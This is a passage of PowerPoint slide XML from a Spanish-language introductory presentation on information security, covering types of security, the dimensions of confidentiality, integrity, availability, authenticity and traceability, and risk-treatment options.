              <a:schemeClr val="accent1">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:srcRect l="50000"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141460" y="1514162"/>
            <a:ext cx="1646989" cy="1630683"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="193330"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Diagrama de flujo: cinta perforada 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD0E8D0F-6EB2-23D7-AE66-5AC5B53941E7}"/>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C92E0E2A-1099-BD4F-AE3B-144122D6F4A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="251936"/>
            <a:ext cx="9884664" cy="138499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Tipos de Seguridad:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Seguridad Organizativa</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{511FB3A7-EF9B-E924-EACD-4A72BAB80193}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">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CuadroTexto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06A648D8-263D-E7AF-F9CE-7BA4A27BDF8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3401027" y="1986513"/>
            <a:ext cx="6490821" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Formación y concienciación</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0232EB00-A692-ED82-B043-7D8DAB8ED48D}"/>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CrisscrossEtching/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1251426" y="3545758"/>
            <a:ext cx="1427055" cy="1427055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CuadroTexto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2914F618-F9C7-BAA2-58B9-28E83D57F617}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496013" y="3025993"/>
            <a:ext cx="3427500" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Políticas y normativas de seguridad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="CuadroTexto 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{451B0FB2-18DB-0E61-9389-A60D83BDC14F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3369378" y="4047922"/>
            <a:ext cx="5445598" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Planes de actuación y gestión de incidentes de seguridad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Flecha: a la derecha 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{099E34D7-91C3-1979-1EAE-9486E4E4720A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2905889" y="2043979"/>
            <a:ext cx="36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latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Flecha: a la derecha 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51B0DC6B-A095-F22F-3377-F6626EA7F2DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2905889" y="4132900"/>
            <a:ext cx="36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latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Flecha: a la derecha 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76366583-3360-E6C2-7F31-E036C34B1041}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7249384" y="3111799"/>
            <a:ext cx="36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latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Imagen 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5AC761E-F9A0-094A-B166-866BE8EBB0BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:duotone>
              <a:schemeClr val="accent1">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8771662" y="4972813"/>
            <a:ext cx="1132245" cy="1132245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="CuadroTexto 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2465B8D-21C4-EEB8-6128-44B08FD328F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3404416" y="5393017"/>
            <a:ext cx="5422482" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Auditoría de seguridad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Flecha: a la derecha 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9ED1735-6C2A-FB40-7574-D1E8513CF1D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7249384" y="5456766"/>
            <a:ext cx="36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latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Imagen 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77438DE5-A459-B6D5-C6C9-674D0F6C9838}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:duotone>
              <a:schemeClr val="accent1">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8256918" y="2261921"/>
            <a:ext cx="1646989" cy="1646989"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Imagen 8" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28C091F1-96C7-DD3B-4C0C-BF5D777A23D7}"/>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529127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E8311-3600-72D3-6807-05E054BFA09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02746D0-7E7C-700A-14AE-31CA1A1FF6C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E778CE2-FA78-6307-B500-C370E20C50F1}"/>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Dimensiones de la Seguridad Informática</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{382E862B-BCF9-3607-C47D-BB68EBBC42E2}"/>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5" name="Imagen 4" descr="Diagrama&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF0A0614-5744-4967-5ADC-63412261AA78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4080555" y="2030237"/>
            <a:ext cx="3789361" cy="3144359"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="CuadroTexto 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7FC3AD1-6312-0EBD-ED8F-019FFBFF2F79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="813883" y="4404990"/>
            <a:ext cx="299282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Autenticidad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="210022"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>garantiza que el autor de la información o del documento es auténtico.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="210022"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="CuadroTexto 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C01A2D37-CD38-D18B-0EF3-3F00C6FC4266}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8142932" y="4404990"/>
            <a:ext cx="29928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Trazabilidad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="210022"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>es la propiedad de un conjunto de datos que garantiza la posibilidad de conocer su origen, uso, recorrido y localización.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="210022"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="CuadroTexto 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB5CEC52-03E1-E766-4B04-2E19166BED03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7763210" y="1412163"/>
            <a:ext cx="29928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Disponibilidad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>la información va a estar disponible para las personas autorizadas en cualquier momento que estas la precisen.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="210022"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="CuadroTexto 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB8C0803-3ABF-8391-337D-FF99A002B313}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4471602" y="5386763"/>
            <a:ext cx="29928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Integridad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>la preservación de los datos.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="210022"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="CuadroTexto 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{585B05AC-CC39-BC47-B28B-D154E73D902F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1132521" y="1412163"/>
            <a:ext cx="299282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Confidencialidad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>la información solo debe ser conocida por las personas autorizadas para ello.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="210022"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Imagen 2" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{730F94D9-89F8-3DAC-CCE7-74F0B658FB8E}"/>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828697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5058C-1415-9422-CF02-31B5ABA9D3C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0CF9145-A57E-745F-4AF9-1F37841A135E}"/>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FC6289F-9146-4381-DA32-172C1E000A12}"/>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Análisis de riesgos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDD0C620-5F18-FE09-E51A-1F867164C7F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699161EB-FBE5-24E3-C4F1-0E46CC64722F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111449" y="1585645"/>
            <a:ext cx="2031047" cy="398033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Tratamiento</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectángulo 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA4D4001-42E8-0726-92E6-E62731F7FEBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3574928" y="1585645"/>
            <a:ext cx="3694038" cy="398033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>¿Qué significa?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectángulo 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5998319-42CC-8D0C-7275-F3BFF3403605}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1096043" y="2914237"/>
            <a:ext cx="2046451" cy="8283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latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Evitarlo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectángulo 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7B72F1C-6A1E-6E4C-FD89-A5D3F7B5AB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1096044" y="2031341"/>
            <a:ext cx="2046451" cy="8204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latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Aceptarlo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectángulo 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{732DA420-8E24-CB35-8804-D8CA5CDB07CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1096042" y="3808740"/>
            <a:ext cx="2046451" cy="8283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latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mitigarlo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectángulo 9">
            <a:extLst>
